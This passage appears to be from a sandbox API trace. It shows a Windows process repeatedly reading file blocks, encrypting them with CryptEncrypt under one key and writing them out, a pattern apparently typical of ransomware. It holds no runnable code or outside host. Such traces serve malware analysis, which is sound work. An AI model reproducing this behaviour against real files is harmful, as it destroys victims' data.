CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.963] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.964] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.964] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.965] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.965] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.966] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.966] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.967] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, 